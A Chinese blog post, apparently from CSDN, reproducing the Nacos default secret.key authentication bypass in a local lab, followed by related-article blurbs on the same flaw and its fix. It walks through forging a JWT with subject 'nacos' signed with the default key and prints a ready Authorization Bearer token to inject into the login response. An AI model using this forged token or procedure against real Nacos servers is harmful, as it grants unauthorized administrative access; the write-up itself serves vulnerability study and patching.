Nacos 默认 secret.key 配置不当权限绕过漏洞复现

最新推荐文章于 2025-03-29 10:31:47 发布
最新推荐文章于 2025-03-29 10:31:47 发布
阅读量5.6k 收藏 8
点赞数 3
文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_27536045/article/details/129710233
版权

Nacos身份认证绕过

参考文章:https://blog.csdn.net/qq_50854662/article/details/129660330

受影响版本:

0.1.0 <= Nacos <= 2.2.0

漏洞的本质是因为使用了默认的key。

漏洞复现:

下载环境:

Release 2.2.0 (Dec 14, 2022) · alibaba/nacos · GitHub

JDK8以上环境运行

startup.cmd -m standalone来启动。

现在安装java环境会自动配置环境变量。但是启动这个nacos需要配置JAVA_HOME

CLASSPATH

.;%Java_Home%\bin;%Java_Home%\lib\dt.jar;%Java_Home%\lib\tools.jar

 

启动nacos

 

访问http://192.168.31.127:8848/nacos/#/login

这里用到了,nacos\conf\application.properties  文件中的nacos.core.auth.plugin.nacos.token.secret.key

 

访问:https://jwt.io/

配置Unix时间戳(秒)我现在是2023-03-22 14:56 伪造时效到2023-03-22 15:30

 

payload

{

  "sub": "nacos",

  "time": "1679470200"

}

sub  为要绕过的账户

time  这里指的有效时间

VERIFY SIGNATURE

这里填写nacos\conf\application.properties  文件中的nacos.core.auth.plugin.nacos.token.secret.key

 

Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsInRpbWUiOiIxNjc5NDcwMjAwIn0.W4K-dcIWbdtJ4QFjAalBRw_TvVgoCO9wSwhyt8coklg

返回包,填入刚才获取的token。

 

 

 

关闭Exit
关注
漏洞复现Nacos系列多漏洞复现
失心少年
10-11 878
也就是nacos的密钥是有默认值的,其鉴权是JWT,我们知道密钥即可伪造一个恶意的JWT令牌来攻击,对于jwt加密 其实就是用了base64 密钥是写死在源码里面的 所以直接可以用jwt伪造攻击,对应就是数据包的accesstoken。在
解决“nacos默认secret.key配置不当权限绕过漏洞
一只没有脚的鸟
01-10 5045
nacos 2.x及以下版本会有一个nacos默认secret.key配置不当权限绕过漏洞,等级为高危。形成原因是nacos配置文件中存在这么一个secret.key会被他人利用进行提权从而达到系统受控的目的。对于这个漏洞大家需要第一时间进行排查,如果有相似情况,可根据本文进行修复。
Nacos 身份认证绕过漏洞(QVD-2023-6271)
feelxing的专栏
03-31 6040
Nacos 身份认证绕过漏洞(QVD-2023-6271),nacos版本从1.4.1升级到2.2.1最新版本
轻松搞定 Nacos 服务器安装部署,构建稳定微服务架构
最新发布
刘哥哥的博客
03-29 338
本文详细介绍了 Nacos 服务器的安装部署过程。从下载合适版本开始,一步步引导你完成环境配置及服务器启动,包括不同系统下的操作要点。无论是新手入门还是寻求优化的开发者,都能从中获取实用信息,助你顺利搭建 Nacos 服务器,为微服务架构奠定坚实基础。
Nacos-默认token.secret.key-配置不当权限绕过漏洞复现
y995zq的博客
04-12 6525
使用JWT时,通常需要使用密钥对token进行签名,确保token在传输过程中不被篡改。,开源服务管理平台 Nacos默认配置下未对 token.secret.key 进行修改,导致远程攻击者可以绕过密钥认证进入后台,造成系统受控等后果。在构造时要注意下时间戳,需要换算一下,比你系统时间要晚一些,比如当前时间时2024年4月12日,在时间戳时间时13日。在登录请求中,拦截数据包,添加Authorization信息,拦截放回包后放包。访问两个网站,一个是时间戳网站,一个是JWT的。
JDK安装2023最完整教程与配置(零基础)
bdfcfff77fa的博客
06-19 1532
JDK安装2023最完整教程与配置(零基础)
漏洞实战(1):NACOS默认密钥漏洞QVD-2023-6271
OneMoreThink
03-09 7630
原理危害攻击资产发现漏洞利用防御1、原理NACOS[1],/nɑ:kəʊs/,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。在<=2.2.0、<=1.4.4的版本中,NACOS配置文件conf/application.properties存在默认密钥nacos.core.auth.plugin.nacos.token.secret.key=SecretKey01...
Nacos默认secret.key绕过权限问题
weixin_46574002的博客
01-22 1267
可以在nacos的conf文件下找到application.properties这个文件 打开之后里面会有这样的配置。如果是将nacos集成到springboot中 需要在nacos的项目中,将这个key按照个人的需求更改同上。可以将这个值按照个人的需求修改,最好不要放明文。nacos有个默认secret.key
Nacos漏洞总结复现_nacos默认jwt密钥导致未授权访问
yy1715713348的博客
10-25 1875
Nacos中发现影响Nacos <= 2.1.0的问题,Nacos用户使用默认JWT密钥导致未授权访问漏洞。通过该漏洞,攻击者可以绕过用户名密码认证,直接登录Nacos用户。
Alibaba Nacos JWT令牌使用默认密钥浅析
lwwzyy
03-18 7408
Nacos服务管理平台因默认密钥导致的认证绕过漏洞。在默认配置为未修改的情况下,攻击者可以构造用户 token 进入后台,导致系统被攻击与控制。许多Nacos 用户只开启了鉴权,但没有修改默认密钥,导致Nacos系统仍存在被入侵的风险。
Nacos漏洞
woshicainiao666的博客
12-29 334
Nacos 是阿里巴巴开源的一款动态服务发现、配置管理和服务治理的解决方案,专为现代化微服务架构设计。其名称来源于 “Dynamic Naming and Configuration Service”,主要用于帮助开发者轻松地构建、发布和管理微服务。●:在某些版本的 Nacos 中,如果没有启用身份验证或默认密钥未修改,攻击者可以利用默认密钥解密敏感数据(如配置数据中的密码),甚至执行远程代码。●:Nacos 使用一个内置的默认密钥(AES),用于加密和解密配置数据。
Nacos身份绕过漏洞(QVD-2023-6271)复现学习
dzqxwzoe的博客
03-01 1157
本文仅做复现,不做分析!其实就是默认keyshiro550exchange的jwt伪造等,都是类似的问题。Nacos是一个易于使用的平台,专为动态服务发现和配置以及服务管理而设计。可以帮助您轻松构建云原生应用程序和微服务平台。目前Nacos身份认证绕过漏洞(),开源服务管理平台Nacos默认配置下未对进行修改,导致远程攻击者可以绕过密钥认证进入后台,造成系统受控等后果。基本上都受到了影响,最新的版本已修复漏洞
Nacos身份绕过漏洞复现(QVD-2023-6271)
cangyu51462的博客
04-23 4095
Nacos身份绕过漏洞复现(QVD-2023-6271)
Nacos使用备忘
YerikStone的博客
11-01 426
Nacos使用备忘 1.远程调用: 在pom文件中引入dubbo依赖包以及对应项目的jar依赖包 <!-- Nacos 注册与配置中心 --> <dependency> <groupId>com.alibaba.cloud</groupId> <artifactId>spring-cloud-starter-alibaba-nacos-config</artifactId> </dependency> <dep
Nacos2.2.3 开启密码配置
Tan_LC的博客
01-23 3723
自定义密钥时,推荐将配置项设置为Base64编码的字符串,且原始密钥长度不得低于32字符,nacos.core.auth.server.identity.keynacos.core.auth.server.identity.value必须要有值。原文链接:https://blog.csdn.net/lianghecai52171314/article/details/132182119。版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
Nacos身份认证绕过的方法
weixin_45802999的博客
08-01 701
因为在攻防或渗透的一些安全服务过程中,我们经常会遇到在公网能访问到的Nacos系统,按理来说这些系统都是要收缩到内网里面的,所以遇到这种情况我们肯定是要去尝试下能否进入到后台,之前团队搞过这类的实验,那就结合这次实验分析一下。 在URL路径后加上nacosnacos登录后台就会暴露出来一、这个实验第一步首先使用第一个方法就是默认口令的尝试,nacos/nacos默认口令去登录,如果运气好的话恭喜你直接登录成功,我的运气只能说时好时坏,没有登录成功。 二、接着使用nacosCreateAccessToke
Nacos身份认证绕过漏洞(QVD-2023-6271)
热门推荐
qq_50854662的博客
03-20 1万+
漏洞原理为开源服务管理平台 Nacos默认配置下未对 token.secret.key 进行修改,导致远程攻击者可以绕过密钥认证进入后台造成系统受控等后果。
配置nacos.core.auth.plugin.nacos.token.secret.key
09-12
nacos.core.auth.plugin.nacos.token.secret.keyNacos 中用于配置身份验证插件的密钥参数。它用于生成和验证身份验证令牌的签名。您可以通过在 Nacos配置文件(application.properties 或 application.yml)中进行配置来设置它的值。具体步骤如下: 1. 打开 Nacos配置文件,通常位于 Nacos 的安装目录下的 conf 目录中。 2.配置文件中找到 nacos.core.auth.plugin.nacos.token.secret.key 参数。 3. 设置 nacos.core.auth.plugin.nacos.token.secret.key 的值为您想要使用的密钥。 请注意,密钥的安全性非常重要,建议使用足够长且随机的字符串作为密钥,并确保将其保密。此外,在更改配置后,您可能需要重新启动 Nacos 以使更改生效。 希望这可以回答您的问题!如果您有任何其他问题,请随时提问。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值